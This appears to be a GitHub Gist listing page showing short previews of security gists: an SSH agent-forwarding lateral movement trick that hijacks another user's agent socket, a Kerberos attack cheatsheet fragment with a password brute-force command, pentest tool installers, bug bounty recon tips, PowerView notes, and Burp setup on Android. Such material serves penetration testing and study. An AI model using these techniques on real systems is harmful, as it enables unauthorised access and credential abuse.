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Michael Ikua ikuamike

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Here's one of my favorite techniques for lateral movement: SSH agent forwarding. Use a UNIX-domain socket to advance your presence on the network. No need for passwords or keys.

root@bastion:~# find /tmp/ssh-* -type s

root@bastion:~# SSH_AUTH_SOCK=/tmp/ssh-srQ6Q5UpOL/agent.1460 ssh [email protected]

user@internal:~$ hostname -f
ropnop /
Created July 18, 2019 02:16
Docker aliases
function dockershell() {
docker run --rm -i -t --entrypoint=/bin/bash "$@"
function dockershellsh() {
docker run --rm -i -t --entrypoint=/bin/sh "$@"
function dockershellhere() {
TarlogicSecurity /
Created May 14, 2019 13:33
A cheatsheet with commands that can be used to perform kerberos attacks

Kerberos cheatsheet



python -domain <domain_name> -users <users_file> -passwords <passwords_file> -outputfile <output_file>

With Rubeus version with brute module:

OffXec /
Last active August 31, 2022 13:25
Installs pentesting tools, then symlinks them to be ran seamlessly.
git clone /opt/seclists
git clone /opt/xsstrike
sudo ln -s /opt/xsstrike/ /usr/local/bin/xsstrike
chmod +x /opt/xsstrike/
git clone /opt/arjun
sudo ln -s /opt/arjun/ /usr/local/bin/arjun
nullenc0de / content_discovery_nullenc0de.txt
Last active October 28, 2024 18:53
This file has been truncated, but you can view the full file.
laurivosandi /
Last active February 8, 2022 03:22
OLED screen demo on ESP32 with MicroPython
# Pull the SDD1306 lib from here
from time import sleep_ms
from machine import Pin, I2C
from ssd1306 import SSD1306_I2C
buf = "wubba lubba dub dub "
i2c = I2C(-1, Pin(4),Pin(5),freq=40000) # Bitbanged I2C bus
assert 60 in i2c.scan(), "No OLED display detected!"
EdOverflow /
Last active January 30, 2025 22:58
My tips for finding security issues in GitHub projects.

GitHub for Bug Bounty Hunters

GitHub repositories can disclose all sorts of potentially valuable information for bug bounty hunters. The targets do not always have to be open source for there to be issues. Organization members and their open source projects can sometimes accidentally expose information that could be used against the target company. in this article I will give you a brief overview that should help you get started targeting GitHub repositories for vulnerabilities and for general recon.

Mass Cloning

You can just do your research on, but I would suggest cloning all the target's repositories so that you can run your tests locally. I would highly recommend @mazen160's GitHubCloner. Just run the script and you should be good to go.

$ python --org organization -o /tmp/output
HarmJ0y / PowerView-3.0-tricks.ps1
Last active March 11, 2025 17:15
PowerView-3.0 tips and tricks
# PowerView's last major overhaul is detailed here:
# tricks for the 'old' PowerView are at
# the most up-to-date version of PowerView will always be in the dev branch of PowerSploit:
# New function naming schema:
# Verbs:
# Get : retrieve full raw data sets
# Find : ‘find’ specific data entries in a data set
oaass /
Last active December 10, 2024 23:10
This will install the additional tools to Kali recommended by "The Hacker Playbook". It will install the tools in /opt/tools
echo ""
echo "=========================================================================="
echo "= Pentest Attack Machine Setup ="
echo "= Based on the setup from The Hacker Playbook ="
echo "=========================================================================="
echo ""
# Prepare tools folder
PaulSec / Burp certificate on Android
Created February 16, 2015 19:40
Add your Burp certificate on an Android device
To do so:
1. Export your Burp Certificate
Proxy > Options > CA Certificate > Export in DER format
2. Convert it to PEM
openssl x509 -inform der -in cacert.der -out burp.pem
3. Download it on the device